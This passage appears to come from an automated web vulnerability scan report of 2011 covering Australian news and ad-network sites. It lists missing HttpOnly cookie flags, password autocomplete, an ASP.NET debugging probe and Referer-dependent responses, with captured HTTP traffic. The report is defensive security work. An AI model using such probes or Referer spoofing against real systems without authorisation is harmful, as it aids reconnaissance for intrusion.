Path:	/dcsw4t3cy00000ctu0wdzjrq1_3q8k/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAARAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAK59Z05AfWdOCwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAACufWdON3xnTgAAAAA-; path=/; expires=Sat, 04-Sep-2021 14:20:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsw4t3cy00000ctu0wdzjrq1_3q8k/dcs.gif?&dcsdat=1315423134092&dcssip=www.abc.net.au&dcsuri=/news/2011-09-07/2875554/&dcsqry=%3Fsite=perth%26section=news&dcsref=http://www.abc.net.au/perth/news/&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1315422868902&WT.tz=-5&WT.bh=14&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Early%20alert%20may%20have%20stopped%20asylum%20boat%20tragedy%20-%20ABC%20Perth%20-%20Australian%20Broadcasting%20Corporation&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/&WT.vt_f_tlh=1315422868&WT.z_dcsid=dcsw4t3cy00000ctu0wdzjrq1_3q8k HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAQAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOCwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAAA3fGdON3xnTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Sep 2011 14:20:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAARAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAK59Z05AfWdOCwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAACufWdON3xnTgAAAAA-; path=/; expires=Sat, 04-Sep-2021 14:20:30 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

9.67. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
dq=3|3|0|0; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
lm="7 Sep 2011 14:14:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.68. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
dq=98|98|0|0; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
lm="7 Sep 2011 14:15:54 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.69. http://user.lucidmedia.com/clicksense/user previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://user.lucidmedia.com
Path:	/clicksense/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.70. http://web.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__impt=1315404854.32171791490; expires=Thu, 08-Sep-2011 14:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

9.71. http://www.abc.net.au/includes/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/includes/scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853301; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.72. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/house_ads_m12.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853207; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.73. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/latest_media_m21.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853217; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.74. http://www.abc.net.au/local/global_css/common_modules/m60_login.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/m60_login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853234; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.75. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/river_of_content_m20.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853184; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.76. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/site_search_m3.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853181; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.77. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/top_stories_m14.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852891; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.78. http://www.abc.net.au/local/global_css/news/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/news/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852896; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.79. http://www.abc.net.au/local/global_css/palettes/generic.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/palettes/generic.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852911; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.80. http://www.abc.net.au/local/global_css/palettes/paletteA.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/palettes/paletteA.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852861; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.81. http://www.abc.net.au/local/global_css/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852838; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.82. http://www.abc.net.au/local/global_css/template/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/template/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852869; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.83. http://www.abc.net.au/local/global_css/yaml/central_draft.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/yaml/central_draft.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852839; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.84. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/yaml/core/slim_base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853497; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.85. http://www.abc.net.au/local/global_scripts/contribute/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_scripts/contribute/functions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853252; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.86. http://www.abc.net.au/local/global_scripts/general.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_scripts/general.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853288; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.87. http://www.abc.net.au/local/includes/scripts/city_include.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/includes/scripts/city_include.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853254; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.88. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/includes/scripts/jquery/plugins/jquery.tools.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853243; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.89. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/includes/scripts/tabs_latest_media.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853287; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.90. http://www.abc.net.au/res/abc/styles/screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/abc/styles/screen.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852841; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.91. http://www.abc.net.au/res/libraries/abcjs/abc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/abcjs/abc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404852837; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.92. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/jquery/jquery-latest.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853242; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.93. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.94. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adfusion.com
Path:	/Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Wed, 07-Mar-2012 15:14:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000782303/mnum=0000904635/cstr=5306309=_4e677c78,6666404307,782303^904635^1184^0,1_/xsxdata=$xsxdata/bnum=5306309/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12

Response

9.95. http://www.investsmart.com.au/promostrip/images/Norm_house120.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.investsmart.com.au
Path:	/promostrip/images/Norm_house120.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSead774=957d5e69ea9d01f1d3bdd95097b22411e197cec677f8e7004e677c21; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promostrip/images/Norm_house120.jpg HTTP/1.1
Host: www.investsmart.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 08 Jun 2011 02:51:42 GMT
Accept-Ranges: bytes
ETag: "136d0ff8625cc1:0"
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:48 GMT
Content-Length: 17374
Set-Cookie: TSead774=957d5e69ea9d01f1d3bdd95097b22411e197cec677f8e7004e677c21; Path=/

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................x.x..
...[SNIP]...

9.96. http://www.wtp101.com/pull_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Fri, 06 Sep 2013 14:14:28 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10. Password field with autocomplete enabled previous next
There are 2 instances of this issue:

http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js
http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

10.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL:

http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

The form contains the following password field with autocomplete enabled:

'+y+'

Request

Response

10.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue detail

The page contains a form with the following action URL:

http://www.watoday.com.au/action/membershipLoginAction

The form contains the following password field with autocomplete enabled:

commentFrmPasswordLogin

Request

Response

11. ASP.NET debugging enabled previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.weatherchannel.com.au
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.weatherchannel.com.au
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/7.0
Date: Wed, 07 Sep 2011 14:14:58 GMT
Connection: close
X-Powered-By: ASP.NET
X-Cache-Info: not cacheable; request wasn't a GET or HEAD
Content-Length: 39

Debug access denied to '/Default.aspx'.

12. Referer-dependent response previous next
There are 6 instances of this issue:

http://ad.yieldmanager.com/imp
http://adnxs.revsci.net/imp
http://www.facebook.com/connect/connect.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

12.1. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.yieldmanager.com
Path:	/imp

Request 1

GET /imp?Z=1x1&s=2433412&B=10&u=&r=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
